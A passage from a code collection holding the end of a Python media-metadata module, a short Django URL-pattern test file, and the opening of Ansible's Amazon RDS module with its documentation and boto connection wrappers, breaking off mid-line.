self.tags = Tags() for key in set(self._keys) - set(['media', 'tags']): setattr(self, key, None) # # unicode and string convertion for debugging # # TODO: Fix that mess def __unicode__(self): result = u'' # print normal attributes lists = [] for key in self._keys: value = getattr(self, key, None) if value is None or key == 'url': continue if isinstance(value, list): if not value: continue elif isinstance(value[0], string_types): # Just a list of strings (keywords?), so don't treat it specially. value = u', '.join(value) else: lists.append((key, value)) continue elif isinstance(value, dict): # Tables or tags treated separately. continue if key in UNPRINTABLE_KEYS: value = '<unprintable data, size=%d>' % len(value) result += u'| %10s: %s\n' % (decode_str(key), decode_str(value)) # print tags (recursively, to support nested tags). def print_tags(tags, suffix, show_label): result = '' for n, (name, tag) in enumerate(tags.items()): result += u'| %12s%s%s = ' % (u'tags: ' if n == 0 and show_label else '', suffix, name) if isinstance(tag, list): # TODO: doesn't support lists/dicts within lists. result += u'%s\n' % ', '.join(subtag.value for subtag in tag) else: result += u'%s\n' % (tag.value or '') if isinstance(tag, dict): result += print_tags(tag, ' ', False) return result result += print_tags(self.tags, '', True) # print lists for key, l in lists: for n, item in enumerate(l): label = '+-- ' + key.rstrip('s').capitalize() if key not in ['tracks', 'subtitles', 'chapters']: label += ' Track' result += u'%s #%d\n' % (label, n + 1) result += '| ' + re.sub(r'\n(.)', r'\n| \1', decode_str(item)) # print tables # FIXME: WTH? # if log.level >= 10: # for name, table in self.tables.items(): # result += '+-- Table %s\n' % str(name) # for key, value in table.items(): # try: # value = unicode(value) # if len(value) > 50: # value = u'<unprintable data, size=%d>' % len(value) # except (UnicodeDecodeError, TypeError): # try: # value = u'<unprintable data, size=%d>' % len(value) # except AttributeError: # value = u'<unprintable data>' # result += u'| | %s: %s\n' % (unicode(key), value) return result def __str__(self): return decode_str(self) def __repr__(self): if hasattr(self, 'url'): return '<%s %s>' % (str(self.__class__)[8:-2], self.url) else: return '<%s>' % (str(self.__class__)[8:-2]) # # internal functions # def _appendtable(self, name, hashmap): """ Appends a tables of additional metadata to the Object. If such a table already exists, the given tables items are added to the existing one. """ if name not in self.tables: self.tables[name] = hashmap else: # Append to the already existing table for k in hashmap.keys(): self.tables[name][k] = hashmap[k] def _set(self, key, value): """ Set key to value and add the key to the internal keys list if missing. 
""" if value is None and getattr(self, key, None) is None: return if isinstance(value, str): value = str_to_unicode(value) setattr(self, key, value) if key not in self._keys: self._keys.append(key) def _set_url(self, url): """ Set the URL of the source """ self.url = url def _finalize(self): """ Correct same data based on specific rules """ # make sure all strings are unicode for key in self._keys: if key in UNPRINTABLE_KEYS: continue value = getattr(self, key) if value is None: continue if key == 'image': if PY2 and isinstance(value, text_type): setattr(self, key, unicode_to_str(value)) continue if isinstance(value, str): setattr(self, key, str_to_unicode(value)) if isinstance(value, text_type): setattr(self, key, value.strip().rstrip().replace(u'\0', u'')) if isinstance(value, list) and value and isinstance(value[0], Media): for submenu in value: submenu._finalize() # copy needed tags from tables for name, table in self.tables.items(): mapping = self.table_mapping.get(name, {}) for tag, attr in mapping.items(): if self.get(attr): continue value = table.get(tag, None) if value is not None: if not isinstance(value, string_types): value = str_to_unicode(str(value)) elif isinstance(value, str): value = str_to_unicode(value) value = value.strip().rstrip().replace(u'\0', u'') setattr(self, attr, value) if 'fourcc' in self._keys and 'codec' in self._keys and self.codec is not None: # Codec may be a fourcc, in which case we resolve it to its actual # name and set the fourcc attribute. self.fourcc, self.codec = fourcc.resolve(self.codec) if 'language' in self._keys: self.langcode, self.language = language.resolve(self.language) # # data access # def __contains__(self, key): """ Test if key exists in the dict """ return hasattr(self, key) def get(self, attr, default=None): """ Returns the given attribute. If the attribute is not set by the parser return 'default'. """ return getattr(self, attr, default) def __getitem__(self, attr): """ Get the value of the given attribute """ return getattr(self, attr, None) def __setitem__(self, key, value): """ Set the value of 'key' to 'value' """ setattr(self, key, value) def has_key(self, key): """ Check if the object has an attribute 'key' """ return hasattr(self, key) def convert(self): """ Convert Media to dict. """ result = {} for k in self._keys: value = getattr(self, k, None) if isinstance(value, list) and value and isinstance(value[0], Media): value = [x.convert() for x in value] result[k] = value return result def keys(self): """ Return all keys for the attributes set by the parser. """ return self._keys class Collection(Media): """ Collection of Digial Media like CD, DVD, Directory, Playlist """ _keys = Media._keys + ['id', 'tracks'] def __init__(self): Media.__init__(self) self.tracks = [] class Tag(object): """ An individual tag, which will be a value stored in a Tags object. Tag values are strings (for binary data), unicode objects, or datetime objects for tags that represent dates or times. 
""" def __init__(self, value=None, langcode='und', binary=False): super(Tag, self).__init__() self.value = value self.langcode = langcode self.binary = binary def __unicode__(self): return decode_str(self.value) def __str__(self): return str(self.value) def __repr__(self): if not self.binary: return '<Tag object: %s>' % repr(self.value) else: return '<Binary Tag object: size=%d>' % len(self.value) @property def langcode(self): return self._langcode @langcode.setter def langcode(self, code): self._langcode, self.language = language.resolve(code) class Tags(dict, Tag): """ A dictionary containing Tag objects. Values can be other Tags objects (for nested tags), lists, or Tag objects. A Tags object is more or less a dictionary but it also contains a value. This is necessary in order to represent this kind of tag specification (e.g. for Matroska):: <Simple> <Name>LAW_RATING</Name> <String>PG</String> <Simple> <Name>COUNTRY</Name> <String>US</String> </Simple> </Simple> The attribute RATING has a value (PG), but it also has a child tag COUNTRY that specifies the country code the rating belongs to. """ def __init__(self, value=None, langcode='und', binary=False): super(Tags, self).__init__() self.value = value self.langcode = langcode self.binary = False class AudioStream(Media): """ Audio Tracks in a Multiplexed Container. """ _keys = Media._keys + AUDIOCORE class Music(AudioStream): """ Digital Music. """ _keys = AudioStream._keys + MUSICCORE def _finalize(self): """ Correct same data based on specific rules """ AudioStream._finalize(self) if self.trackof: try: # XXX Why is this needed anyway? if int(self.trackno) < 10: self.trackno = u'0%s' % int(self.trackno) except (AttributeError, ValueError): pass class VideoStream(Media): """ Video Tracks in a Multiplexed Container. """ _keys = Media._keys + VIDEOCORE class Chapter(Media): """ Chapter in a Multiplexed Container. """ _keys = ['enabled', 'name', 'pos', 'id'] def __init__(self, name=None, pos=0): Media.__init__(self) self.name = name self.pos = pos self.enabled = True class Subtitle(Media): """ Subtitle Tracks in a Multiplexed Container. """ _keys = ['enabled', 'default', 'langcode', 'language', 'trackno', 'title', 'id', 'codec'] def __init__(self, language=None): Media.__init__(self) self.language = language class AVContainer(Media): """ Container for Audio and Video streams. This is the Container Type for all media, that contain more than one stream. """ _keys = Media._keys + AVCORE def __init__(self): Media.__init__(self) self.audio = [] self.video = [] self.subtitles = [] self.chapters = [] def _finalize(self): """ Correct same data based on specific rules """ Media._finalize(self) if not self.length and len(self.video) and self.video[0].length: self.length = 0 # Length not specified for container, so use the largest length # of its tracks as container length. for track in self.video + self.audio: if track.length: self.length = max(self.length, track.length)
hectord/lettuce
refs/heads/master
tests/integration/lib/Django-1.3/tests/regressiontests/urlpatterns_reverse/included_named_urls.py
55
from django.conf.urls.defaults import *

from views import empty_view


urlpatterns = patterns('',
    url(r'^$', empty_view, name="named-url3"),
    url(r'^extra/(?P<extra>\w+)/$', empty_view, name="named-url4"),
    url(r'^(?P<one>\d+)|(?P<two>\d+)/$', empty_view),
    (r'^included/', include('regressiontests.urlpatterns_reverse.included_named_urls2')),
)
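A quick way to see what the named groups in these patterns capture is to run them through plain re; this is only an illustration and deliberately sidesteps Django's URL resolver, and the sample paths are invented:

# Illustration with plain re, not Django's resolver; sample paths are invented.
import re

extra_pattern = re.compile(r'^extra/(?P<extra>\w+)/$')
alt_pattern = re.compile(r'^(?P<one>\d+)|(?P<two>\d+)/$')

print(extra_pattern.match('extra/foo/').groupdict())   # {'extra': 'foo'}

# Because of the alternation, only one of the two named groups is populated.
print(alt_pattern.match('42').groupdict())             # {'one': '42', 'two': None}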
grilo/ansible-1
refs/heads/devel
lib/ansible/modules/cloud/amazon/rds.py
5
#!/usr/bin/python # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['stableinterface'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: rds version_added: "1.3" short_description: create, delete, or modify an Amazon rds instance description: - Creates, deletes, or modifies rds instances. When creating an instance it can be either a new instance or a read-only replica of an existing instance. This module has a dependency on python-boto >= 2.5. The 'promote' command requires boto >= 2.18.0. Certain features such as tags rely on boto.rds2 (boto >= 2.26.0) options: command: description: - Specifies the action to take. The 'reboot' option is available starting at version 2.0 required: true choices: [ 'create', 'replicate', 'delete', 'facts', 'modify' , 'promote', 'snapshot', 'reboot', 'restore' ] instance_name: description: - Database instance identifier. Required except when using command=facts or command=delete on just a snapshot required: false default: null source_instance: description: - Name of the database to replicate. Used only when command=replicate. required: false default: null db_engine: description: - The type of database. Used only when command=create. - mariadb was added in version 2.2 required: false default: null choices: ['mariadb', 'MySQL', 'oracle-se1', 'oracle-se2', 'oracle-se', 'oracle-ee', 'sqlserver-ee', 'sqlserver-se', 'sqlserver-ex', 'sqlserver-web', 'postgres', 'aurora'] size: description: - Size in gigabytes of the initial storage for the DB instance. Used only when command=create or command=modify. required: false default: null instance_type: description: - The instance type of the database. Must be specified when command=create. Optional when command=replicate, command=modify or command=restore. If not specified then the replica inherits the same instance type as the source instance. required: false default: null username: description: - Master database username. Used only when command=create. required: false default: null password: description: - Password for the master database username. Used only when command=create or command=modify. required: false default: null region: description: - The AWS region to use. If not specified then the value of the EC2_REGION environment variable, if any, is used. required: true aliases: [ 'aws_region', 'ec2_region' ] db_name: description: - Name of a database to create within the instance. If not specified then no database is created. Used only when command=create. required: false default: null engine_version: description: - Version number of the database engine to use. Used only when command=create. If not specified then the current Amazon RDS default engine version is used required: false default: null parameter_group: description: - Name of the DB parameter group to associate with this instance. If omitted then the RDS default DBParameterGroup will be used. 
Used only when command=create or command=modify. required: false default: null license_model: description: - The license model for this DB instance. Used only when command=create or command=restore. required: false default: null choices: [ 'license-included', 'bring-your-own-license', 'general-public-license', 'postgresql-license' ] multi_zone: description: - Specifies if this is a Multi-availability-zone deployment. Can not be used in conjunction with zone parameter. Used only when command=create or command=modify. choices: [ "yes", "no" ] required: false default: null iops: description: - Specifies the number of IOPS for the instance. Used only when command=create or command=modify. Must be an integer greater than 1000. required: false default: null security_groups: description: - Comma separated list of one or more security groups. Used only when command=create or command=modify. required: false default: null vpc_security_groups: description: - Comma separated list of one or more vpc security group ids. Also requires `subnet` to be specified. Used only when command=create or command=modify. required: false default: null port: description: - Port number that the DB instance uses for connections. Used only when command=create or command=replicate. - Prior to 2.0 it always defaults to null and the API would use 3306, it had to be set to other DB default values when not using MySql. Starting at 2.0 it automatically defaults to what is expected for each c(db_engine). required: false default: 3306 for mysql, 1521 for Oracle, 1433 for SQL Server, 5432 for PostgreSQL. upgrade: description: - Indicates that minor version upgrades should be applied automatically. Used only when command=create or command=replicate. required: false default: no choices: [ "yes", "no" ] option_group: description: - The name of the option group to use. If not specified then the default option group is used. Used only when command=create. required: false default: null maint_window: description: - > Maintenance window in format of ddd:hh24:mi-ddd:hh24:mi. (Example: Mon:22:00-Mon:23:15) If not specified then a random maintenance window is assigned. Used only when command=create or command=modify. required: false default: null backup_window: description: - Backup window in format of hh24:mi-hh24:mi. If not specified then a random backup window is assigned. Used only when command=create or command=modify. required: false default: null backup_retention: description: - > Number of days backups are retained. Set to 0 to disable backups. Default is 1 day. Valid range: 0-35. Used only when command=create or command=modify. required: false default: null zone: description: - availability zone in which to launch the instance. Used only when command=create, command=replicate or command=restore. required: false default: null aliases: ['aws_zone', 'ec2_zone'] subnet: description: - VPC subnet group. If specified then a VPC instance is created. Used only when command=create. required: false default: null snapshot: description: - Name of snapshot to take. When command=delete, if no snapshot name is provided then no snapshot is taken. If used with command=delete with no instance_name, the snapshot is deleted. Used with command=facts, command=delete or command=snapshot. required: false default: null aws_secret_key: description: - AWS secret key. If not set then the value of the AWS_SECRET_KEY environment variable is used. required: false aliases: [ 'ec2_secret_key', 'secret_key' ] aws_access_key: description: - AWS access key. 
If not set then the value of the AWS_ACCESS_KEY environment variable is used. required: false default: null aliases: [ 'ec2_access_key', 'access_key' ] wait: description: - When command=create, replicate, modify or restore then wait for the database to enter the 'available' state. When command=delete wait for the database to be terminated. required: false default: "no" choices: [ "yes", "no" ] wait_timeout: description: - how long before wait gives up, in seconds default: 300 apply_immediately: description: - Used only when command=modify. If enabled, the modifications will be applied as soon as possible rather than waiting for the next preferred maintenance window. default: no choices: [ "yes", "no" ] force_failover: description: - Used only when command=reboot. If enabled, the reboot is done using a MultiAZ failover. required: false default: "no" choices: [ "yes", "no" ] version_added: "2.0" new_instance_name: description: - Name to rename an instance to. Used only when command=modify. required: false default: null version_added: "1.5" character_set_name: description: - Associate the DB instance with a specified character set. Used with command=create. required: false default: null version_added: "1.9" publicly_accessible: description: - explicitly set whether the resource should be publicly accessible or not. Used with command=create, command=replicate. Requires boto >= 2.26.0 required: false default: null version_added: "1.9" tags: description: - tags dict to apply to a resource. Used with command=create, command=replicate, command=restore. Requires boto >= 2.26.0 required: false default: null version_added: "1.9" requirements: - "python >= 2.6" - "boto" author: - "Bruce Pennypacker (@bpennypacker)" - "Will Thames (@willthames)" extends_documentation_fragment: - aws - ec2 ''' # FIXME: the command stuff needs a 'state' like alias to make things consistent -- MPD EXAMPLES = ''' # Basic mysql provisioning example - rds: command: create instance_name: new-database db_engine: MySQL size: 10 instance_type: db.m1.small username: mysql_admin password: 1nsecure tags: Environment: testing Application: cms # Create a read-only replica and wait for it to become available - rds: command: replicate instance_name: new-database-replica source_instance: new_database wait: yes wait_timeout: 600 # Delete an instance, but create a snapshot before doing so - rds: command: delete instance_name: new-database snapshot: new_database_snapshot # Get facts about an instance - rds: command: facts instance_name: new-database register: new_database_facts # Rename an instance and wait for the change to take effect - rds: command: modify instance_name: new-database new_instance_name: renamed-database wait: yes # Reboot an instance and wait for it to become available again - rds: command: reboot instance_name: database wait: yes # Restore a Postgres db instance from a snapshot, wait for it to become available again, and # then modify it to add your security group. Also, display the new endpoint. 
# Note that the "publicly_accessible" option is allowed here just as it is in the AWS CLI - local_action: module: rds command: restore snapshot: mypostgres-snapshot instance_name: MyNewInstanceName region: us-west-2 zone: us-west-2b subnet: default-vpc-xx441xxx publicly_accessible: yes wait: yes wait_timeout: 600 tags: Name: pg1_test_name_tag register: rds - local_action: module: rds command: modify instance_name: MyNewInstanceName region: us-west-2 vpc_security_groups: sg-xxx945xx - debug: msg: "The new db endpoint is {{ rds.instance.endpoint }}" ''' RETURN = ''' engine: description: the name of the database engine returned: when RDS instance exists type: string sample: "oracle-se" engine_version: description: the version of the database engine returned: when RDS instance exists type: string sample: "11.2.0.4.v6" license_model: description: the license model information returned: when RDS instance exists type: string sample: "bring-your-own-license" character_set_name: description: the name of the character set that this instance is associated with returned: when RDS instance exists type: string sample: "AL32UTF8" allocated_storage: description: the allocated storage size in gigabytes (GB) returned: when RDS instance exists type: string sample: "100" publicly_accessible: description: the accessibility options for the DB instance returned: when RDS instance exists type: boolean sample: "true" latest_restorable_time: description: the latest time to which a database can be restored with point-in-time restore returned: when RDS instance exists type: string sample: "1489707802.0" secondary_avaialbility_zone: description: the name of the secondary AZ for a DB instance with multi-AZ support returned: when RDS instance exists and is multy-AZ type: string sample: "eu-west-1b" backup_window: description: the daily time range during which automated backups are created if automated backups are enabled returned: when RDS instance exists and automated backups are enabled type: string sample: "03:00-03:30" auto_minor_version_upgrade: description: indicates that minor engine upgrades will be applied automatically to the DB instance during the maintenance window returned: when RDS instance exists type: boolean sample: "true" read_replica_source_dbinstance_identifier: description: the identifier of the source DB instance if this RDS instance is a read replica returned: when read replica RDS instance exists type: string sample: "null" db_name: description: the name of the database to create when the DB instance is created returned: when RDS instance exists type: string sample: "ASERTG" parameter_groups: description: the list of DB parameter groups applied to this RDS instance returned: when RDS instance exists and parameter groups are defined type: complex contains: parameter_apply_status: description: the status of parameter updates returned: when RDS instance exists type: string sample: "in-sync" parameter_group_name: description: the name of the DP parameter group returned: when RDS instance exists type: string sample: "testawsrpprodb01spfile-1ujg7nrs7sgyz" option_groups: description: the list of option group memberships for this RDS instance returned: when RDS instance exists type: complex contains: option_group_name: description: the option group name for this RDS instance returned: when RDS instance exists type: string sample: "default:oracle-se-11-2" status: description: the status of the RDS instance's option group membership returned: when RDS instance exists type: string sample: "in-sync" 
pending_modified_values: description: a dictionary of changes to the RDS instance that are pending returned: when RDS instance exists type: complex contains: db_instance_class: description: the new DB instance class for this RDS instance that will be applied or is in progress returned: when RDS instance exists type: string sample: "null" db_instance_identifier: description: the new DB instance identifier this RDS instance that will be applied or is in progress returned: when RDS instance exists type: string sample: "null" allocated_storage: description: the new allocated storage size for this RDS instance that will be applied or is in progress returned: when RDS instance exists type: string sample: "null" backup_retention_period: description: the pending number of days for which automated backups are retained returned: when RDS instance exists type: string sample: "null" engine_version: description: indicates the database engine version returned: when RDS instance exists type: string sample: "null" iops: description: the new provisioned IOPS value for this RDS instance that will be applied or is being applied returned: when RDS instance exists type: string sample: "null" master_user_password: description: the pending or in-progress change of the master credentials for this RDS instance returned: when RDS instance exists type: string sample: "null" multi_az: description: indicates that the single-AZ RDS instance is to change to a multi-AZ deployment returned: when RDS instance exists type: string sample: "null" port: description: specifies the pending port for this RDS instance returned: when RDS instance exists type: string sample: "null" db_subnet_groups: description: information on the subnet group associated with this RDS instance returned: when RDS instance exists type: complex contains: description: description: the subnet group associated with the DB instance returned: when RDS instance exists type: string sample: "Subnets for the UAT RDS SQL DB Instance" name: description: the name of the DB subnet group returned: when RDS instance exists type: string sample: "samplesubnetgrouprds-j6paiqkxqp4z" status: description: the status of the DB subnet group returned: when RDS instance exists type: string sample: "complete" subnets: description: the description of the DB subnet group returned: when RDS instance exists type: complex contains: availability_zone: description: subnet availability zone information returned: when RDS instance exists type: complex contains: name: description: avaialbility zone returned: when RDS instance exists type: string sample: "eu-west-1b" provisioned_iops_capable: description: whether provisioned iops are available in AZ subnet returned: when RDS instance exists type: boolean sample: "false" identifier: description: the identifier of the subnet returned: when RDS instance exists type: string sample: "subnet-3fdba63e" status: description: the status of the subnet returned: when RDS instance exists type: string sample: "active" ''' import sys import time from ansible.module_utils.ec2 import AWSRetry try: import boto.rds HAS_BOTO = True except ImportError: HAS_BOTO = False try: import boto.rds2 has_rds2 = True except ImportError: has_rds2 = False DEFAULT_PORTS = { 'aurora': 3306, 'mariadb': 3306, 'mysql': 3306, 'oracle': 1521, 'sqlserver': 1433, 'postgres': 5432, } class RDSException(Exception): def __init__(self, exc): if hasattr(exc, 'error_message') and exc.error_message: self.message = exc.error_message self.code = exc.error_code elif hasattr(exc, 'body') and 
'Error' in exc.body: self.message = exc.body['Error']['Message'] self.code = exc.body['Error']['Code'] else: self.message = str(exc) self.code = 'Unknown Error' class RDSConnection: def __init__(self, module, region, **aws_connect_params): try: self.connection = connect_to_aws(boto.rds, region, **aws_connect_params) except boto.exception.BotoServerError as e: module.fail_json(msg=e.error_message) def get_db_instance(self, instancename): try: return RDSDBInstance(self.connection.get_all_dbinstances(instancename)[0]) except boto.exception.BotoServerError as e: return None def get_db_snapshot(self, snapshotid): try: return RDSSnapshot(self.connection.get_all_dbsnapshots(snapshot_id=snapshotid)[0]) except boto.exception.BotoServerError as e: return None def create_db_instance(self, instance_name, size, instance_class, db_engine, username, password, **params): params['engine'] = db_engine try: result = self.connection.create_dbinstance(instance_name, size, instance_class, username, password, **params) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def create_db_instance_read_replica(self, instance_name, source_instance, **params): try: result = self.connection.createdb_instance_read_replica(instance_name, source_instance, **params) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def delete_db_instance(self, instance_name, **params): try: result = self.connection.delete_dbinstance(instance_name, **params) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def delete_db_snapshot(self, snapshot): try: result = self.connection.delete_dbsnapshot(snapshot) return RDSSnapshot(result) except boto.exception.BotoServerError as e: raise RDSException(e) def modify_db_instance(self, instance_name, **params): try: result = self.connection.modify_dbinstance(instance_name, **params) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def reboot_db_instance(self, instance_name, **params): try: result = self.connection.reboot_dbinstance(instance_name) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def restore_db_instance_from_db_snapshot(self, instance_name, snapshot, instance_type, **params): try: result = self.connection.restore_dbinstance_from_dbsnapshot(snapshot, instance_name, instance_type, **params) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def create_db_snapshot(self, snapshot, instance_name, **params): try: result = self.connection.create_dbsnapshot(snapshot, instance_name) return RDSSnapshot(result) except boto.exception.BotoServerError as e: raise RDSException(e) def promote_read_replica(self, instance_name, **params): try: result = self.connection.promote_read_replica(instance_name, **params) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) class RDS2Connection: def __init__(self, module, region, **aws_connect_params): try: self.connection = connect_to_aws(boto.rds2, region, **aws_connect_params) except boto.exception.BotoServerError as e: module.fail_json(msg=e.error_message) def get_db_instance(self, instancename): try: dbinstances = self.connection.describe_db_instances( db_instance_identifier=instancename )['DescribeDBInstancesResponse']['DescribeDBInstancesResult']['DBInstances'] result = RDS2DBInstance(dbinstances[0]) return result except 
boto.rds2.exceptions.DBInstanceNotFound as e: return None except Exception as e: raise e def get_db_snapshot(self, snapshotid): try: snapshots = self.connection.describe_db_snapshots( db_snapshot_identifier=snapshotid, snapshot_type='manual' )['DescribeDBSnapshotsResponse']['DescribeDBSnapshotsResult']['DBSnapshots'] result = RDS2Snapshot(snapshots[0]) return result except boto.rds2.exceptions.DBSnapshotNotFound as e: return None def create_db_instance(self, instance_name, size, instance_class, db_engine, username, password, **params): try: result = self.connection.create_db_instance(instance_name, size, instance_class, db_engine, username, password, **params)['CreateDBInstanceResponse']['CreateDBInstanceResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def create_db_instance_read_replica(self, instance_name, source_instance, **params): try: result = self.connection.create_db_instance_read_replica( instance_name, source_instance, **params )['CreateDBInstanceReadReplicaResponse']['CreateDBInstanceReadReplicaResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def delete_db_instance(self, instance_name, **params): try: result = self.connection.delete_db_instance(instance_name, **params)['DeleteDBInstanceResponse']['DeleteDBInstanceResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def delete_db_snapshot(self, snapshot): try: result = self.connection.delete_db_snapshot(snapshot)['DeleteDBSnapshotResponse']['DeleteDBSnapshotResult']['DBSnapshot'] return RDS2Snapshot(result) except boto.exception.BotoServerError as e: raise RDSException(e) def modify_db_instance(self, instance_name, **params): try: result = self.connection.modify_db_instance(instance_name, **params)['ModifyDBInstanceResponse']['ModifyDBInstanceResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def reboot_db_instance(self, instance_name, **params): try: result = self.connection.reboot_db_instance(instance_name, **params)['RebootDBInstanceResponse']['RebootDBInstanceResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def restore_db_instance_from_db_snapshot(self, instance_name, snapshot, instance_type, **params): try: result = self.connection.restore_db_instance_from_db_snapshot( instance_name, snapshot, **params )['RestoreDBInstanceFromDBSnapshotResponse']['RestoreDBInstanceFromDBSnapshotResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def create_db_snapshot(self, snapshot, instance_name, **params): try: result = self.connection.create_db_snapshot(snapshot, instance_name, **params)['CreateDBSnapshotResponse']['CreateDBSnapshotResult']['DBSnapshot'] return RDS2Snapshot(result) except boto.exception.BotoServerError as e: raise RDSException(e) def promote_read_replica(self, instance_name, **params): try: result = self.connection.promote_read_replica(instance_name, **params)['PromoteReadReplicaResponse']['PromoteReadReplicaResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) class RDSDBInstance: def __init__(self, dbinstance): self.instance = dbinstance self.name = dbinstance.id self.status = dbinstance.status def get_data(self): d = { 'id': self.name, 'create_time': 
self.instance.create_time, 'status': self.status, 'availability_zone': self.instance.availability_zone, 'backup_retention': self.instance.backup_retention_period, 'backup_window': self.instance.preferred_backup_window, 'maintenance_window': self.instance.preferred_maintenance_window, 'multi_zone': self.instance.multi_az, 'instance_type': self.instance.instance_class, 'username': self.instance.master_username, 'iops': self.instance.iops } # Only assign an Endpoint if one is available if hasattr(self.instance, 'endpoint'): d["endpoint"] = self.instance.endpoint[0] d["port"] = self.instance.endpoint[1] if self.instance.vpc_security_groups is not None: d["vpc_security_groups"] = ','.join(x.vpc_group for x in self.instance.vpc_security_groups) else: d["vpc_security_groups"] = None else: d["endpoint"] = None d["port"] = None d["vpc_security_groups"] = None # ReadReplicaSourceDBInstanceIdentifier may or may not exist try: d["replication_source"] = self.instance.ReadReplicaSourceDBInstanceIdentifier except Exception as e: d["replication_source"] = None return d class RDS2DBInstance: def __init__(self, dbinstance): self.instance = dbinstance if 'DBInstanceIdentifier' not in dbinstance: self.name = None else: self.name = self.instance.get('DBInstanceIdentifier') self.status = self.instance.get('DBInstanceStatus') def get_data(self): d = { 'id': self.name, 'create_time': self.instance['InstanceCreateTime'], 'engine': self.instance['Engine'], 'engine_version': self.instance['EngineVersion'], 'license_model': self.instance['LicenseModel'], 'character_set_name': self.instance['CharacterSetName'], 'allocated_storage': self.instance['AllocatedStorage'], 'publicly_accessible': self.instance['PubliclyAccessible'], 'latest_restorable_time': self.instance['LatestRestorableTime'], 'status': self.status, 'availability_zone': self.instance['AvailabilityZone'], 'secondary_avaialbility_zone': self.instance['SecondaryAvailabilityZone'], 'backup_retention': self.instance['BackupRetentionPeriod'], 'backup_window': self.instance['PreferredBackupWindow'], 'maintenance_window': self.instance['PreferredMaintenanceWindow'], 'auto_minor_version_upgrade': self.instance['AutoMinorVersionUpgrade'], 'read_replica_source_dbinstance_identifier': self.instance['ReadReplicaSourceDBInstanceIdentifier'], 'multi_zone': self.instance['MultiAZ'], 'instance_type': self.instance['DBInstanceClass'], 'username': self.instance['MasterUsername'], 'db_name': self.instance['DBName'], 'iops': self.instance['Iops'], 'replication_source': self.instance['ReadReplicaSourceDBInstanceIdentifier'] } if self.instance['DBParameterGroups'] is not None: parameter_groups = [] for x in self.instance['DBParameterGroups']: parameter_groups.append({'parameter_group_name': x['DBParameterGroupName'], 'parameter_apply_status': x['ParameterApplyStatus']}) d['parameter_groups'] = parameter_groups if self.instance['OptionGroupMemberships'] is not None: option_groups = [] for x in self.instance['OptionGroupMemberships']: option_groups.append({'status': x['Status'], 'option_group_name': x['OptionGroupName']}) d['option_groups'] = option_groups if self.instance['PendingModifiedValues'] is not None: pdv = self.instance['PendingModifiedValues'] d['pending_modified_values'] = { 'multi_az': pdv['MultiAZ'], 'master_user_password': pdv['MasterUserPassword'], 'port': pdv['Port'], 'iops': pdv['Iops'], 'allocated_storage': pdv['AllocatedStorage'], 'engine_version': pdv['EngineVersion'], 'backup_retention_period': pdv['BackupRetentionPeriod'], 'db_instance_class': 
pdv['DBInstanceClass'], 'db_instance_identifier': pdv['DBInstanceIdentifier'] } if self.instance["DBSubnetGroup"] is not None: dsg = self.instance["DBSubnetGroup"] db_subnet_groups = {} db_subnet_groups['vpc_id'] = dsg['VpcId'] db_subnet_groups['name'] = dsg['DBSubnetGroupName'] db_subnet_groups['status'] = dsg['SubnetGroupStatus'].lower() db_subnet_groups['description'] = dsg['DBSubnetGroupDescription'] db_subnet_groups['subnets'] = [] for x in dsg["Subnets"]: db_subnet_groups['subnets'].append({ 'status': x['SubnetStatus'].lower(), 'identifier': x['SubnetIdentifier'], 'availability_zone': { 'name': x['SubnetAvailabilityZone']['Name'], 'provisioned_iops_capable': x['SubnetAvailabilityZone']['ProvisionedIopsCapable'] } }) d['db_subnet_groups'] = db_subnet_groups if self.instance["VpcSecurityGroups"] is not None: d['vpc_security_groups'] = ','.join(x['VpcSecurityGroupId'] for x in self.instance['VpcSecurityGroups']) if "Endpoint" in self.instance and self.instance["Endpoint"] is not None: d['endpoint'] = self.instance["Endpoint"].get('Address', None) d['port'] = self.instance["Endpoint"].get('Port', None) else: d['endpoint'] = None d['port'] = None return d class RDSSnapshot: def __init__(self, snapshot): self.snapshot = snapshot self.name = snapshot.id self.status = snapshot.status def get_data(self): d = { 'id': self.name, 'create_time': self.snapshot.snapshot_create_time, 'status': self.status, 'availability_zone': self.snapshot.availability_zone, 'instance_id': self.snapshot.instance_id, 'instance_created': self.snapshot.instance_create_time, } # needs boto >= 2.21.0 if hasattr(self.snapshot, 'snapshot_type'): d["snapshot_type"] = self.snapshot.snapshot_type if hasattr(self.snapshot, 'iops'): d["iops"] = self.snapshot.iops return d class RDS2Snapshot: def __init__(self, snapshot): if 'DeleteDBSnapshotResponse' in snapshot: self.snapshot = snapshot['DeleteDBSnapshotResponse']['DeleteDBSnapshotResult']['DBSnapshot'] else: self.snapshot = snapshot self.name = self.snapshot.get('DBSnapshotIdentifier') self.status = self.snapshot.get('Status') def get_data(self): d = { 'id': self.name, 'create_time': self.snapshot['SnapshotCreateTime'], 'status': self.status, 'availability_zone': self.snapshot['AvailabilityZone'], 'instance_id': self.snapshot['DBInstanceIdentifier'], 'instance_created': self.snapshot['InstanceCreateTime'], 'snapshot_type': 